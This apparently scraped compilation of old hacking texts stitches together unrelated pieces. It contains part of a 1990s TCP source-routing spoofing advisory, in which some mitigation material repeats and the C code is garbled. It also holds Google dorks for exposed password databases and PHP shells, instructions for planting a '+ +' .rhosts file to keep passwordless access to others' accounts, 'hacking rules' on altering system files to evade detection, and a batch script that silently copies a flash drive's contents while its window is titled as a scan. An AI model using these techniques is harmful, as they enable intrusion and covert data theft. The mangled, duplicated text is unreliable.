the connection, however removes the options via setsockopt(). In this case
when control is passed to in.rshd, it will never see any options present,
and the connection will remain open (even if in.rshd has the above patch
incorporated). An option to completely drop source routed connections will
hopefully be provided in the next release of TCP wrappers. The other option
is to undefine KILL_IP_OPTIONS, which appears to be undefined by default.
This passes through IP options and allows the called daemon to handle them
accordingly.

Disabling Source Routing
~~~~~~~~~~~~~~~~~~~~~~~~

We believe the following information to be accurate, however it is not
guaranteed.

--- Cisco

To have the router discard any datagram containing an IP source route option
issue the following command:

no ip source-route

This is a global configuration option.

--- NetBSD

Versions of NetBSD prior to 1.2 did not provide the capability for disabling
source routing. Other versions ship with source routing ENABLED by default.
We do not know of a way to prevent NetBSD from accepting source routed packets.
NetBSD systems, however, can be configured to prevent the forwarding of packets
when acting as a gateway.

To determine whether forwarding of source routed packets is enabled,
issue the following command:

# sysctl net.inet.ip.forwarding
# sysctl net.inet.ip.forwsrcrt

The response will be either 0 or 1, 0 meaning off, and 1 meaning it is on.

Forwarding of source routed packets can be turned off via:

# sysctl -w net.inet.ip.forwsrcrt=0

Forwarding of all packets in general can turned off via:

# sysctl -w net.inet.ip.forwarding=0

--- BSD/OS

BSDI has made a patch availible for rshd, rlogind, tcpd and nfsd. This
patch is availible at:

ftp://ftp.bsdi.com/bsdi/patches/patches-2.1

OR via their patches email server

The patch number is
U210-037 (normal version)
D210-037 (domestic version for sites running kerberized version)

BSD/OS 2.1 has source routing disabled by default

Previous versions ship with source routing ENABLED by default. As far as
we know, BSD/OS cannot be configured to drop source routed packets destined
for itself, however can be configured to prevent the forwarding of such
packets when acting as a gateway.

To determine whether forwarding of source routed packets is enabled,
issue the following command:

# sysctl net.inet.ip.forwarding
# sysctl net.inet.ip.forwsrcrt

The response will be either 0 or 1, 0 meaning off, and 1 meaning it is on.

Forwarding of source routed packets can be turned off via:

# sysctl -w net.inet.ip.forwsrcrt=0

Forwarding of all packets in general can turned off via:

# sysctl -w net.inet.ip.forwarding=0

--- OpenBSD

Ships with source routing turned off by default. To determine whether source
routing is enabled, the following command can be issued:

# sysctl net.inet.ip.sourceroute

The response will be either 0 or 1, 0 meaning that source routing is off,
and 1 meaning it is on. If source routing has been turned on, turn off via:

# sysctl -w net.inet.ip.sourceroute=0

This will prevent OpenBSD from forwarding and accepting any source routed
packets.

--- FreeBSD

Ships with source routing turned off by default. To determine whether source
routing is enabled, the following command can be issued:

# sysctl net.inet.ip.sourceroute

The response will be either 0 or 1, 0 meaning that source routing is off,
and 1 meaning it is on. If source routing has been turned on, turn off via:

# sysctl -w net.inet.ip.sourceroute=0

--- Linux

Linux by default has source routing disabled in the kernel.

--- Solaris 2.x

Ships with source routing enabled by default. Solaris 2.5.1 is one of the
few commercial operating systems that does have unpredictable sequence
numbers, which does not help in this attack.

We know of no method to prevent Solaris from accepting source routed
connections, however, Solaris systems acting as gateways can be prevented
from forwarding any source routed packets via the following commands:

# ndd -set /dev/ip ip_forward_src_routed 0

You can prevent forwarding of all packets via:

# ndd -set /dev/ip ip_forwarding 0

These commands can be added to /etc/rc2.d/S69inet to take effect at bootup.

--- SunOS 4.x

We know of no method to prevent SunOS from accepting source routed
connections, however a patch is availible to prevent SunOS systems from
forwarding source routed packets.

This patch is availible at:

ftp://ftp.secnet.com/pub/patches/source-routing-patch.tar.gz

To configure SunOS to prevent forwarding of all packets, the following
command can be issued:

# echo "ip_forwarding/w 0" | adb -k -w /vmunix /dev/mem
# echo "ip_forwarding?w 0" | adb -k -w /vmunix /dev/mem

The first command turns off packet forwarding in /dev/mem, the second in
/vmunix.

--- HP-UX

HP-UX does not appear to have options for configuring an HP-UX system to
prevent accepting or forwarding of source routed packets. HP-UX has IP
forwarding turned on by default and should be turned off if acting as a
firewall. To determine whether IP forwarding is currently on, the following
command can be issued:

# adb /hp-ux
ipforwarding?X <- user input
ipforwarding:
ipforwarding: 1
#

A response of 1 indicates IP forwarding is ON, 0 indicates off. HP-UX can
be configured to prevent the forwarding of any packets via the following
commands:

# adb -w /hp-ux /dev/kmem
ipforwarding/W 0
ipforwarding?W 0
^D
#

--- AIX

AIX cannot be configured to discard source routed packets destined for itself,
however can be configured to prevent the forwarding of source routed packets.
IP forwarding and forwarding of source routed packets specifically can be
turned off under AIX via the following commands:

To turn off forwarding of all packets:

# /usr/sbin/no -o ipforwarding=0

To turn off forwarding of source routed packets:

# /usr/sbin/no -o nonlocsrcroute=0

Note that these commands should be added to /etc/rc.net

If shutting off source routing is not possible and you are still using
services which rely on IP address authentication, they should be disabled
immediately (in.rshd, in.rlogind). in.rlogind is safe if .rhosts and
/etc/hosts.equiv are not used.

Attributions
~~~~~~~~~~~~

Thanks to Niels Provos for providing
the information and details of this attack. You can view his web
site at http://www.physnet.uni-hamburg.de/provos

Thanks to Theo de Raadt, the maintainer of OpenBSD for forwarding this
information to us. More information on OpenBSD can be found at
http://www.openbsd.org

Thanks to Keith Bostic for discussion and a quick
solution for BSD/OS.

Thanks to Brad Powell for providing information
for Solaris 2.x and SunOS 4.x operating systems.

Thanks go to CERT and AUSCERT for recommendations in this advisory.

You can contact the author of this advisory at oliver@secnet.com

A simple TCP spoofing attack

Over the past few years TCP sequence number prediction attacks have become a
real threat against unprotected networks, taking advantage of the inherent
trust relationships present in many network installations. TCP sequence
number prediction attacks have most commonly been implemented by opening a
series of connections to the target host, and attempting to predict the
sequence number which will be used next. Many operating systems have
therefore attempted to solve this problem by implementing a method of
generating sequence numbers in unpredictable fashions. This method does
not solve the problem.

This advisory introduces an alternative method of obtaining the initial
sequence number from some common trusted services. The attack presented here
does not require the attacker to open multiple connections, or flood a port
on the trusted host to complete the attack. The only requirement is that
source routed packets can be injected into the target network with fake
source addresses.

This advisory assumes that the reader already has an understanding of how
TCP sequence number prediction attacks are implemented.

The impact of this advisory is greatly diminished due to the large number of
organizations which block source routed packets and packets with addresses
inside of their networks. Therefore we present the information as more of
a 'heads up' message for the technically inclined, and to re-iterate that
the randomization of TCP sequence numbers is not an effective solution
against this attack.

Technical Details
~~~~~~~~~~~~~~~~~

The problem occurs when particular network daemons accept connections
with source routing enabled, and proceed to disable any source routing
options on the connection. The connection is allowed to continue, however
the reverse route is no longer used. An example attack can launched against
the in.rshd daemon, which on most systems will retrieve the socket options
via getsockopt() and then turn off any dangerous options via setsockopt().

An example attack follows.

Host A is the trusted host
Host B is the target host
Host C is the attacker

Host C initiates a source routed connection to in.rshd on host B, pretending
to be host A.

Host C spoofing Host A --> Host B in.rshd

Host B receives the initial SYN packet, creates a new PCB (protocol
control block) and associates the route with the PCB. Host B responds,
using the reverse route, sending back a SYN/ACK with the sequence number.

Host C spoofing Host A <-- Host B in.rshd

Host C responds, still spoofing host A, acknowledging the sequence number.
Source routing options are not required on this packet.

Host C spoofing Host A --> Host B in.rshd

We now have an established connection, the accept() call completes, and
control is now passed to the in.rshd daemon. The daemon now does IP
options checking and determines that we have initiated a source routed
connection. The daemon now turns off this option, and any packets sent
thereafter will be sent to the real host A, no longer using the reverse
route which we have specified. Normally this would be safe, however the
attacking host now knows what the next sequence number will be. Knowing
this sequence number, we can now send a spoofed packet without the source
routing options enabled, pretending to originate from Host A, and our
command will be executed.

In some conditions the flooding of a port on the real host A is required
if larger ammounts of data are sent, to prevent the real host A from
responding with an RST. This is not required in most cases when performing
this attack against in.rshd due to the small ammount of data transmitted.

It should be noted that the sequence number is obtained before accept()
has returned and that this cannot be prevented without turning off source
routing in the kernel.

As a side note, we're very lucky that TCP only associates a source route with
a PCB when the initial SYN is received. If it accepted and changed the ip
options at any point during a connection, more exotic attacks may be possible.
These could include hijacking connections across the internet without playing
a man in the middle attack and being able to bypass IP options checking
imposed by daemons using getsockopt(). Luckily *BSD based TCP/IP stacks will
not do this, however it would be interesting to examine other implementations.

Impact
~~~~~~

The impact of this attack is similar to the more complex TCP sequence
number prediction attack, yet it involves fewer steps, and does not require
us to 'guess' the sequence number. This allows an attacker to execute
arbitrary commands as root, depending on the configuration of the target
system. It is required that trust is present here, as an example, the use
of .rhosts or hosts.equiv files.

Solutions
~~~~~~~~~

The ideal solution to this problem is to have any services which rely on
IP based authentication drop the connection completely when initially
detecting that source routed options are present. Network administrators
and users can take precautions to prevent users outside of their network
from taking advantage of this problem. The solutions are hopefully already
either implemented or being implemented.

1. Block any source routed connections into your networks
2. Block any packets with internal based address from entering your network.

Network administrators should be aware that these attacks can easily be
launched from behind filtering routers and firewalls. Internet service
providers and corporations should ensure that internal users cannot launch
the described attacks. The precautions suggested above should be implemented
to protect internal networks.

Example code to correctly process source routed packets is presented here
as an example. Please let us know if there are any problems with it.
This code has been tested on BSD based operating systems.

u_char optbuf[BUFSIZ/3];
int optsize = sizeof(optbuf), ipproto, i;
struct protoent *ip;

if ((ip = getprotobyname("ip")) != NULL)
ipproto = ip->p_proto;
else
ipproto = IPPROTO_IP;
if (!getsockopt(0, ipproto, IP_OPTIONS, (char *)optbuf, &optsize) &&
optsize != 0) {
for (i = 0; i < c =" optbuf[i];" c ="="" c ="="" c ="="" c ="="" forwsrcrt="0" forwarding="0" com="">

The patch number is
U210-037 (normal version)
D210-037 (domestic version for sites running kerberized version)

BSD/OS 2.1 has source routing disabled by default

Previous versions ship with source routing ENABLED by default. As far as
we know, BSD/OS cannot be configured to drop source routed packets destined
for itself, however can be configured to prevent the forwarding of such
packets when acting as a gateway.

To determine whether forwarding of source routed packets is enabled,
issue the following command:

# sysctl net.inet.ip.forwarding
# sysctl net.inet.ip.forwsrcrt

The response will be either 0 or 1, 0 meaning off, and 1 meaning it is on.

Forwarding of source routed packets can be turned off via:

# sysctl -w net.inet.ip.forwsrcrt=0

Forwarding of all packets in general can turned off via:

# sysctl -w net.inet.ip.forwarding=0

--- OpenBSD

Ships with source routing turned off by default. To determine whether source
routing is enabled, the following command can be issued:

# sysctl net.inet.ip.sourceroute

The response will be either 0 or 1, 0 meaning that source routing is off,
and 1 meaning it is on. If source routing has been turned on, turn off via:

# sysctl -w net.inet.ip.sourceroute=0

This will prevent OpenBSD from forwarding and accepting any source routed
packets.

--- FreeBSD

Ships with source routing turned off by default. To determine whether source
routing is enabled, the following command can be issued:

# sysctl net.inet.ip.sourceroute

The response will be either 0 or 1, 0 meaning that source routing is off,
and 1 meaning it is on. If source routing has been turned on, turn off via:

# sysctl -w net.inet.ip.sourceroute=0

--- Linux

Linux by default has source routing disabled in the kernel.

--- Solaris 2.x

Ships with source routing enabled by default. Solaris 2.5.1 is one of the
few commercial operating systems that does have unpredictable sequence
numbers, which does not help in this attack.

We know of no method to prevent Solaris from accepting source routed
connections, however, Solaris systems acting as gateways can be prevented
from forwarding any source routed packets via the following commands:

# ndd -set /dev/ip ip_forward_src_routed 0

You can prevent forwarding of all packets via:

# ndd -set /dev/ip ip_forwarding 0

These commands can be added to /etc/rc2.d/S69inet to take effect at bootup.

--- SunOS 4.x

We know of no method to prevent SunOS from accepting source routed
connections, however a patch is availible to prevent SunOS systems from
forwarding source routed packets.

This patch is availible at:

ftp://ftp.secnet.com/pub/patches/source-routing-patch.tar.gz

To configure SunOS to prevent forwarding of all packets, the following
command can be issued:

# echo "ip_forwarding/w 0" | adb -k -w /vmunix /dev/mem
# echo "ip_forwarding?w 0" | adb -k -w /vmunix /dev/mem

The first command turns off packet forwarding in /dev/mem, the second in
/vmunix.

--- HP-UX

HP-UX does not appear to have options for configuring an HP-UX system to
prevent accepting or forwarding of source routed packets. HP-UX has IP
forwarding turned on by default and should be turned off if acting as a
firewall. To determine whether IP forwarding is currently on, the following
command can be issued:

# adb /hp-ux
ipforwarding?X <- user input ipforwarding: ipforwarding: 1 # A response of 1 indicates IP forwarding is ON, 0 indicates off. HP-UX can be configured to prevent the forwarding of any packets via the following commands: # adb -w /hp-ux /dev/kmem ipforwarding/W 0 ipforwarding?W 0 ^D # --- AIX AIX cannot be configured to discard source routed packets destined for itself, however can be configured to prevent the forwarding of source routed packets. IP forwarding and forwarding of source routed packets specifically can be turned off under AIX via the following commands: To turn off forwarding of all packets: # /usr/sbin/no -o ipforwarding=0 To turn off forwarding of source routed packets: # /usr/sbin/no -o nonlocsrcroute=0 Note that these commands should be added to /etc/rc.net If shutting off source routing is not possible and you are still using services which rely on IP address authentication, they should be disabled immediately (in.rshd, in.rlogind). in.rlogind is safe if .rhosts and /etc/hosts.equiv are not used. Attributions ~~~~~~~~~~~~ Thanks to Niels Provos for providing
the information and details of this attack. You can view his web
site at http://www.physnet.uni-hamburg.de/provos

Thanks to Theo de Raadt, the maintainer of OpenBSD for forwarding this
information to us. More information on OpenBSD can be found at
http://www.openbsd.org

Thanks to Keith Bostic for discussion and a quick
solution for BSD/OS.

Thanks to Brad Powell for providing information
for Solaris 2.x and SunOS 4.x operating systems.

Thanks go to CERT and AUSCERT for recommendations in this advisory.

You can contact the author of this advisory at oliver@secnet.com

free sms

* Open http://thesmszone.com
* After http://thesmszone.com/ page opens, click on Register Now link.
* Fill-² data requested is particularly marked (*) are required.
* For you who live in Indonesia, the data Mobile Phone start with the number 62 .... for example, your number 08123456789, the writing becomes 628123456789.
* 5. Check the box ... I have read and I am at least 13 years of age.7. TheSMSzone.com will then send the activation code to your phone, wait a moment.
* Once you receive the activation code, open the back http://www.thesmszone.com/ login with your username and password, then click Active your account here.
* To try your free sms, click on the Send SMS

learn hacking google

- Use Basic ----------------

- Google does not "case sensitive".
Keyword: linux = = LiNuX LINUX
Will produce the same

- AND: The Default use Google and keyword.
Keyword: a hacker
Search results will contain the word "to" and "hacker"

- OR: Used to find pages that contain at least one
one of the keyword. Note: OR written with all capital letters.
Keyword: hacker OR c ** c * er
Search results will contain the word "hacker" or "c ** c * er"

- +: Google will ignore the search with words such as general
"How" and "where". If the words of this very important public, you
can add a "+" in front of the keyword.
Keyword: how hackers ==> The "how" will be ignored
Keyword: how hackers + ==> The "how" will be included

- -: Sign of the minus "-" can be used to exclude words
particular in the search. For example we want to find words
"Linus without linux", we can use the "Linus-linux"

- *: Google does not support the search * as a replacement letter.
Suppose we want to explore with future menja *
Google does not find the word "guest", "become", "creep", etc.
Google search will yield only to a word
"Menja".

But google support * in the search expression.
Keyword: "* a hacker"
Search results can lead to "be a hacker,"
"A white hacker", etc..

- "": It can be used to search for a full term.
Keyword: "a hacker"
Search results will contain the words "a hacker"

-?: Can be used to search the Google directory
Keyword:? Intitle: index.of? mp3

- Special Plans ----------------

- Example of search results --

Google -> Title
... Language Tools. Ways to help with tsunami relief \
Advertising Programs - About Google © 2005 Google -> Description
Searching 8,058,044,651 web pages. /
www.google.com/ - 3k - 5 Jan 2005 -> URL

- Example of search results --

- Intitle: To search for words from the title of a web page.
Keyword: intitle: Admin Administration
Keyword search for the title will be the "Admin" with the
description "Administration"

- Allintitle: To search for words from the title of web pages
the full.
Keyword: allintitle: Admin Administration
Keyword will find pages that contain the title
the word "Admin" and "Administration"

- Inurl: Used to search for all URLs that contain the words
certain.
Keyword: inurl: Admin Administration
Keyword will find a URL that contains the word "Admin"
with the description "Administration"

- Allinurl: Used to search for all URLs that contain the words
certain.
Keyword: allinurl: Admin Administration
Keyword search will be a URL that contains the word "Admin"
and "Administration"

- Site: To find a site in a particular course
Keyword: site: binushacker.net
All the search only on site "binushacker.net"

- Cache: When Googlebot from indexing a site, google will
take a snapshot of all the pages that have been indexed.
This helps operators see the pages that have been
dicache.
Keyword: cache: binushacker.net
Suppose the original site is no longer active, you can still view it
the snapshot / cache stored by Google.

- Define: Plans are used to find the definition of the phrase
certain. All said that a service will be after
treated as a phrase.
Keyword: define: hacker

- Filetype: If we find a certain type of file that contains information
you want we can use this service.
Keyword: "hacker" filetype: pdf
Until this paper made google file type support
# Adobe Portable Document Format (pdf)
# Adobe PostScript (ps)
# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
# Lotus WordPro (lwp)
# MacWrite (mw)
# Microsoft Excel (xls)
# Microsoft PowerPoint (ppt)
# Microsoft Word (doc)
# Microsoft Works (wks, wps, wdb)
# Microsoft Write (wri)
# Rich Text Format (rtf)
# Shockwave Flash (swf)
# Text (ans, txt)
Ref: http://www.google.com/help/faq_filetypes.html

- Link: To find out how many links to a site, we can
use the service link.
Keyword: link: www.google.com

- Related: To explore the contents page is similar to a specific URL.
Keyword: related: www.google.com

- Google URL Manipulation --------------

> And can replace google interface with the variable hl
(default google hl = en => English)
Suppose we change the interface into its language.
Ex:
http://www.google.com/search?hl=en&lr=&q=site% 3Abinushacker.net & btnG = Search
Results URL modifications
http://www.google.com/search?hl=id&lr=&q=site% 3Abinushacker.net & btnG = Search

You can change the search results only in a specific language. This
done with variable modifications lr.
(default google lr = lang_en => English)
Suppose our search results only English.
Ex:
http://www.google.com/search?hl=en&lr=&q=site% 3Abinushacker.net & btnG = Search
Results URL modifications
http://www.google.com/search?hl=en&lr=lang_id&q=site% 3Abinushacker.net & btnG = Search

> By default Google will display 10 site perhalaman. You can
change it directly through the URL, with the added variables
num in the URL
Use num between 1-100
Ex:
http://www.google.com/search?hl=en&lr=&q=site% 3Abinushacker.net & btnG = Search
Results URL modifications
http://www.google.com/search?num=100&hl=en&lr=&q=site% 3Abinushacker.net & btnG = Search

> As_qdr = mx: are other variables that can be used. This variable
used determine the month based on the results. x between 1-12
Ex:
http://www.google.com/search?hl=en&lr=&q=site% 3Abinushacker.net & btnG = Search
Results URL modifications
http://www.google.com/search?hl=en&lr=&as_qdr=m1&q=site% 3Abinushacker.net & btnG = Search

> Safe = off: the meaning of this variable filter "SafeSearch" turned off. "SafeSearch"
to filter search results sexual.

With the knowledge you can create your own computer in the form Google
alone. So it does not need to visit http://www.google.com
first (unless you use google brwoser that support the built-in
or use the Google Toolbar). By doing this we can save
bandwidth to overseas
Because of bandwidth in Indonesia expensive ... ... ..

Sample script google.html with varabielnya.

- BOF google.html --

Variable num:

Variable hl:

Variable lr:

Variable as_qdr:

Variable safe:

- Google.html EOF --

You live a variable that you do not want or
add anything there. Overall it's up to you
Here is the script default google search.

- BOF google.html --

- Google.html EOF --

Google still continues to be developed. To see what the
Google developed. You can to http://labs.google.com

- Tips & Tricks -----------------

From basic and special service is you can mix
in-service operator.

Ex:
- Keyword: site: binushacker.net, produce all binushacker.net site. Then
you can try keyword: site: binushacker.net hackers, will produce
all binushacker.net site that contains the word hacker.

We are also able to search specifically through google.
To do this you can to the site below:
- Http://www.google.com/bsd
- Http://www.google.com/mac
- Http://www.google.com/linux
- Http://www.google.com/microsoft
- Http://www.google.com/univ/education

Various tricks on the Google keyword:
parent directory books-xxx-html-htm-php-shtml-opendivx-md5-md5sums
parent directory / appz /-xxx-html-htm-php-shtml-opendivx-md5-md5sums
parent directory DVDRip-xxx-html-htm-php-shtml-opendivx-md5-md5sums
parent directory video-xxx-html-htm-php-shtml-opendivx-md5-md5sums
parent directory Gamez-xxx-html-htm-php-shtml-opendivx-md5-md5sums
parent directory MP3-xxx-html-htm-php-shtml-opendivx-md5-md5sums

intitle: index of intitle: mp3-html-htm name size
intitle: index of intitle: video-html-htm name size
intitle: index of intitle: cgi-bin passwd-html-htm name size
intitle: index of intitle: cgi-bin password-html-htm name size

inurl: "admin.mdb"-html
inurl: "password.mdb"-html
inurl: "data.mdb"-html
"PhpMyAdmin" "running on" inurl: "main.php"
intitle: "PHP Shell" "Enable stderr" php

Installing & Hacking From Linux

All you people that thought you were good hackers, because you could fool
dumb sysadmins, and do a bit of social engineering, or hack something by
following someones carefully prepared text file. Well you're about to get
fucked if you read this text file you will find out that you are a hacker
but, the only thing you can do is use someone elses ideas. So with that in
mind here goes.
I wrote this text file because i know a lot of people who could
benefit from learning to use linux, especially when hacking.
First of all you need to get linux installed on your system so goto
http://www.redhat.com I would suggest you invest $40 in buying the newest
version of RedHat linux this way you will get all the files you want/need
on one cd. If you have a problem with paying that price, then contact me
and i will ship you a copy for half that price, yes only $20! If you are
really cheap (like me :-) you could try and download it, i have gotten it
to work before but it's really not worth the wait, i spent a total download
time of about 3 days to download all the files i wanted, and if one of the
files dosn't work, well you're pretty much fucked. Whatever you decide to
do, weather it's purchasing a copy from me or from redhat.com, or being
cheap :-) and downloading it, you should read the linux documentation
project especially the installation part, it will save you hours of worry.
I will touch down very briefly on what you have to do to install linux, but
not nearly enough for you to understand the installation. Many people will
tell you not to buy RedHat products because they're full of bugs, this is
true, and I couldn't agree more, but the bugs are present if you're trying
to hack teh box, so in this case just get RedHat Linux, since it's by far
the most user friendly and the easiest to install. On the other hand if you
are intending to run a sophisticated webserver do NOT get redhat, get
something like slackware, or debian linux.
If you are planning to use linux to access the net etc... you will
need to read the FAQ on compatability at http://www.redhat.com, i currently
don't know of any distribution of linux that supports winmodem or any other
type of modem that uses windows software to speed it up, these modems are
generally those yukky U.S robotics modems.
From now on I'm assuming you either purchased RedHat linux from me
or from RedHat. O.K lets get started, you will need to partition your
harddrive, to do this goto dos and type in fdisk choose no. 4 to view current
partitions. If you have one large partition that fills your whole harddrive
just reserved for windows then once again you're fucked. You need to back up
all your shit, before performing the steps below. Once everything is backed
up go to dos yet again and type 8in fdisk, now you need to delete your
current partition and set a new primary partition the primary partition
should not fill your whole harddrive, leave as much space as you want
unpartitioned, this unpartitioned space is what you're going to be putting
linux on. So now thats done restore your old windows shit and make sure
everything is working nice and dandy. Now pop in your redhat cd in your
cd-rom drive, and reboot your system. Follow the instructions until you
get to a screen that asks if you wish to use fdisk or disk druid to partition
your harddrive, just choose disk druid, now you need to set up a native linux
partition i recommdn 500 megs, but if you wanna be fancy put about 800 megs.
Now after you have assighned a native linux partition and labeled it / Then
you need to assighn swap space, assighn as much as you see fit mine is about
55 megs. It is also a good idea to label your dos partition i label mine
/dos this is so i can access files in my dos partition while using linux.
Once that is done click on OK and save the partition tables, when you get to
the place where you choose what to install. If you have a partition thats
more than 600 MB then choose the install everything option at the bottom of
the list, if your partition is below 600 MB, then choose everything on the
list except the install everything option. If by some chance you just want
a very basic setup, this is what i used to run, just choose x-windows, DNS
Nameserver, Dial-UP workstation,c++ development, and c development. This
will give you everything youneed to compile programs in ,linux, connect to
your ISP, run x-windows etc....
X-Windows is a graphical interface for linux it's very very nice
it's kinda like windows 95 but it dosn't suck as much, by the way I will be
refeering to windows 95 as winblows, for obvious reasons :-).
Once everything is installed, it will tr to sonfigure x-windows for
you, this is where it actually helps if you know every little chip in your
system, if you don't well tehn just guess, but whatever you do don't install
Metro-X, just install XFree86 x-server it's better, well after all that shit
you will need to install LILO, LILO is a boot manager it allows you to boot
into dos, linux and whatever other O/S's you may have lying around in yuor
system, once all that is set up, you will be asked if you wish to install a
printer or not, figure that part out yourself, it's pretty straight forward,
so I'm not gonna waste my time. I wouldn't recommend configuring a LAN
unless you know your shit about linux.
So once setup is finished , your system will reboot. WOA you just
installed linux and you're still alive it's amazing isn't it. So now you
should be faced with a prompt that says LILO Boot:
you can now press tab for options this will show which operating systems you
can boot into. You should ahve the following two choices dos and linux, now
since this text file covers linux you would want to boot into linux so at
the LILO prompt type in linux or simply press return, since linux is your
default operating system. Now you should see a bunch of services starting,
this indicates that linux is loading.
When you reach the login prompt type in root and use the password
you specefied for the setup program earlier. Finally you have redhat linux
installed on your system, and hopefully you're still alive, you're still
with me RIGHT!!!!! O.K so you have logged in as root, first thing you want
to do us shadow your password file I always do thsi because then at least i
know a little clueless newbie could never get in my system, to do this type
in pwconv. Well thats all you have to do, to me it's a shock that there are
so many unshadowed systems on the net when it's so easy to shadow the
password file, but i guess ignorance is the satan of all god's people. Well
i guess you're like dying to show your friends how k-rad and elite you are,
so I guess well better geton to setting up linux to use the net, in other
words to dial out to your ISP. O.K heres how you do it. When you're at the
prompt type in startx this will start up x-windows. Once x-windows is
started, you should see an interface much like windows 95, to the left
should be a box named control panel, in the center you should see a window
named local-host, this is simply the rootshell just like the one you get
when you login. Now to get the modem set up, in the control panel there
should be a lot of small icons, goto the 6th one down (modem configuration)
choose what com port your modem is on, if you dont know choose SOM 1 it
seems to be the default in most computers in gateways i do believe it's
COM 2, once thats done, goto the 5th icon down in the control panel
(network configuration)and click it, now choose interfaces then goto add,
choose ppp as your interface type. Put in your ISP's phone number, and
your login and password. Then choose customize, click on networking and
click on activate interface at boot time, once this is done goto done and
choose to save the configuration. Well thats it simply reboot by typing in
reboot and listen to your sweet modem's music.
Now that you're connected to your ISP let's go do some surfing, once
you're in x-windows, goto start/applications and click on Netscape Navigator.
Visit http://www.rootshell.com and run a search for scan, once you're
confronted with the search results, go down and find the file named
xenolith.tgz download that file. This is a neat little scanner that scans
sites for volunerabilities, and I'm basiacly gonna give you a lesson in
uncompressing files in linux. Once the file is downloaded goto the dir in
which it resides. Since it's a .tgz file we would uncompress it using the
following method. Type in gunzip -d xenolith.tgz this will give you
xenolith.tar then type in gzip xenolith.tgz this gives you xenolith.tar.gz
then type in zcat xenolith.tar.gz | tar xvf - . This will give you a dir
called xenolith just cd xenolith and read the README files for installation
instructions. I just thought i would include something on uncompressing
files because many people ask me for help on the topic.
Well I'm getting to the place where I have to think about what i
want to put in this text file, well here's something I will include, a
section with some useful command, so here goes. To shutdown your computer
type in shutdown -h now (your message) to reboot simply type reboot. To
compile use gcc filename.c -o filename. To talk to a user type in write
username then on the next line write your message, if you don't want people
to send you messages type in mesg n. Well i sure hop this guide helped you
through getting linux installed if you want to read books on linux and
you're cheap like me goto http://www.mcp.com and sighn up for their personal
bookshelf, and get reading tons of books for free, it's a hackers dream and
all time paradise.
Now just as you thought it was over I'm gonna show you a few hacking
tricks from linux not really how to hack just some useful commands, so here
goes. To telnet to a site type in telnet www.victim.com ,to telnet toa
site on a specific port type in telnet www.victim.com portnumbe. Let's say
i wanted to telnet to port 25 i would type in telnet www.victim.com 25 .
To FTP to a machine type in ftp www.victim.com. To rlogin to a machine,
many of you proably dont know what the hell im talking about so let me
explain. If you place a file called .rhosts in someones home directory and
that file has two plusses like this + + in it you can use the rlogin command
to log into the system using that account without a password. Ring a bell
in your mind? filling with fresh ideas. I use this method whenever I geta
shell account, it assures me that if they by any chance change the passowrd
I can always rlogin into the system assuming that the account has a .rhosts
file in it and the file contains + + then you're in good shape. Assume the
username of the account is lamer. So inorder to rlogin into lamer's account
we would do the follwoing. Type in rlogin www.victim.com -l lamer . This
will telnet us directly into lamer's account where we can start rooting the
system.
Well my hand hurts from typing too much, so I'm gonna stop typing,
please if you have any questions, suggestions, or comments, e-mail them to
ameister@vol.com. Also i nee some suggestions on what to write text files
about so please e-mail me, it would be greatly appreciated. Me and some
friends are going to be making a magazine with lots of text files and other
interesting hacking material, if you would like a copy e-mail me for more
info, the price should be no mroe than $4 Shipping & Handling included.
http://www.vol.com/~ameister

Hacker's Manifesto

Hacker's Manifesto

"This is our world now...the world of the electron and the switch, the beauty of the baud.
We make use of a service already existing without paying for what could be dirt cheep if it
wasn't run by profiteering gluttons, and you call us criminals. We explore...and you call us
criminals. We exist without skin color, without nationality, without religious bias...and you
call us criminals. You build atomic bombs, wage wars, murder, cheat, and lie to us and try to
make us believe it is for our own good, yet we're the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by
what they say and think, not what they look like. My crime is that of outsmarting you, something
that you will never forgive me for. I am a hacker and this is my manifesto. You may stop this
individual, but you can't stop us all...after all, we're all alike."

Why hack?

Why hack?

As said above, we hack to gain knowledge about systems and the
way they work. We do NOT want to damage systems in any way. If you do
damage a system, you WILL get caught. But, if you don't damage
anything, it is very unlikely that you will be noticed, let alone be
tracked down and arrested, which costs a considerable amount of time
and money.
Beginners should read all the files that they can get their
hands on about anything even remotely related to hacking and phreaking,
BEFORE they start hacking. I know it sounds stupid and boring but it
will definetly pay off in the future. The more you read about hacking
and phreaking, the more unlikely it is that you will get caught. Some
of the most useless pieces of information that you read could turn out
to be the most helpful. That is why you need to read everything
possible.

Hacking rules

1. Never damage any system. This will only get you into trouble.

2. Never alter any of the systems files, except for those needed to
insure that you are not detected, and those to insure that you have
access into that computer in the future.

3. Do not share any information about your hacking projects with
anyone but those you'd trust with your life.

4. When posting on BBS's (Bulletin Board Systems) be as vague as
possible when describing your current hacking projects. BBS's CAN
be monitered by law enforcement.

5. Never use anyone's real name or real phone number when posting
on a BBS.

6. Never leave your handle on any systems that you hack in to.

7. DO NOT hack government computers.

8. Never speak about hacking projects over your home telephone line.

9. Be paranoid. Keep all of your hacking materials in a safe place.

10. To become a real hacker, you have to hack. You can't just sit
around reading text files and hanging out on BBS's. This is not what
hacking is all about.

What is hacking?

What is hacking?

Hacking is the act of penetrating computer systems to gain knowledge about the system and how it works. Hacking is illegal because we demand free access to ALL data, and we get it. This pisses people off and we are outcasted from society, and in order to stay out of prison, we must keep our status of being a hacker/phreaker a secret. We can't discuss our findings with anyone but other members of the hacking/phreaking community for fear of being punished. We are punished for wanting to learn. Why is the government spending huge amounts of time and money to arrest hackers when there are other much more dangerous people out there. It is the murderers, rapists, terrorists, kidnappers, and burglers who should be punished for what they have done, not hackers. We do NOT pose a threat to anyone. We are NOT out to hurt people or there computers. I admit that there are some people out there who call themselves hackers and who deliberately damage computers. But these people are criminals, NOT hackers. I don't care what the government says, we are NOT criminals. We are NOT trying to alter or damage any system. This is widely misunderstood. Maybe one day people will believe us when we say that all we want is to learn.
There are only two ways to get rid of hackers and phreakers.
One is to get rid of computers and telephones, in which case we would find other means of getting what we want.(Like that is really going to happen.) The other way is to give us what we want, which is free access to ALL information. Until one of those two things happen, we are not
going anywhere.

Copy the entire contents of Flash One Click

Senin, 05 Januari 2009

Copy the entire contents of Flash One Click
In this example, the flash drive is G:
Create a folder (eg called) \ XCP in drive D:
Create a file "COPYFLASH.BAT" in the Windows Directory
This is the content:

@ echo off
title "flash disk scanning ..."
prompt $ H
dir g: / b
xcopy g:. d: \ xcp / E / C / Q / G / H / R / Y
title "complete scan ..."
exit

Create shortcutnya on the Desktop icon for the cool
